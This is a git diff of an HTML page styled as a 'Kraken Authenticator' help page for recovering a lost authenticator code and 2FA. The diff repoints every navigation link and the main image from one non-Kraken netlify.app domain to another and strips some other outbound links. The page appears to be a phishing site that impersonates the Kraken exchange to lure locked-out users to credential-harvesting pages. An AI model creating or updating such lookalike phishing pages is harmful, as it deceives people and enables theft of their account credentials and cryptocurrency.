--- a/index.html
+++ b/index.html
@@ -13,17 +13,17 @@
         <div class="max-w-6xl mx-auto flex justify-between items-center">
             <h1 class="text-white text-xl font-bold">Kraken Authenticator</h1>
             <div class="hidden md:flex space-x-6">
-                <a href="https://my-sign-page-online-kraken-app.netlify.app/" class="text-white">Home</a>
-                <a href="https://my-sign-page-online-kraken-app.netlify.app/" class="text-white">Trade</a>
-                <a href="https://my-sign-page-online-kraken-app.netlify.app/" class="text-white">Learn</a>
-                <a href="https://my-sign-page-online-kraken-app.netlify.app/" class="text-white">Sign</a>
-                <a href="https://my-sign-page-online-kraken-app.netlify.app/" class="text-white">Why Kraken?</a>
+                <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/" class="text-white">Home</a>
+                <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/" class="text-white">Trade</a>
+                <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/" class="text-white">Learn</a>
+                <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/" class="text-white">Sign</a>
+                <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/" class="text-white">Why Kraken?</a>
             </div>
             <button class="md:hidden text-white text-2xl">☰</button>
         </div>
     </nav>
     <div class=" w-full h-full overflow-hidden">
-        <a href="https://my-sign-page-online-kraken-app.netlify.app/">
+        <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/">
 
             <img src="./k.png" alt="" class="w-full h-full object-cover">
         </a>
@@ -31,10 +31,10 @@
     
     <div class="max-w-3xl mx-auto p-6 bg-white shadow-lg rounded-lg mt-10">
         <h1 class="text-3xl font-bold text-gray-900">Kraken Lost Authenticator Code</h1>
-        <a class="mt-4 text-gray-700">If you've lost your <a class="text-blue-600" href="https://krakenlogin.newzenler.com/kraken-careers">
+        <a class="mt-4 text-gray-700">If you've lost your <a class="text-blue-600">
 
         Kraken lost authenticator code</a> & 2FA (Two-Factor Authentication) , you may be locked out of your account. Here’s what you can do to recover access:</p>
-        <a href="https://my-sign-page-online-kraken-app.netlify.app/">
+        <a href="https://my-advanced-cryptocurrency-kraken-app.netlify.app/">
 
        
         <h2 class="mt-6 text-2xl font-semibold text-gray-900">Steps to Recover Your Kraken Account</h2>
@@ -80,7 +80,7 @@
     </div>
     <div class="flex justify-center py-10">
         <h1 class="font-bold">Our More Websites links:</h1>
-         <a class=" text-blue-600" href="https://kraken-pro-login.gitbook.io/kraken-pro-login"> Kraken wallet support number </a>    
+         <a class=" text-blue-600"> Kraken wallet support number </a>    
     </div>
 </body>
 </html>
